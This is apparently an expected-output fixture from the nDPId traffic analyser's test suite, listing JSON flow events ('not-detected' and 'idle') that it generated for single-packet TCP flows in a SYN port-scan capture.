+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3871,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3871,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5922,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5922,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":828,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5922,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":828,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5922,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1805,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5925,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1805,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5925,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1852,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5925,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1852,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5925,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":798,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3878,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":798,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3878,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":857,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3878,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":857,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3878,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10024,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3880,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3880,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10025,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10024,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3880,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3880,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10025,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1839,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1839,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1839,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1839,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1840,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1840,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3889,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3889,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1840,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1840,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3889,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3889,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5950,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5950,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5950,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5950,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5952,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 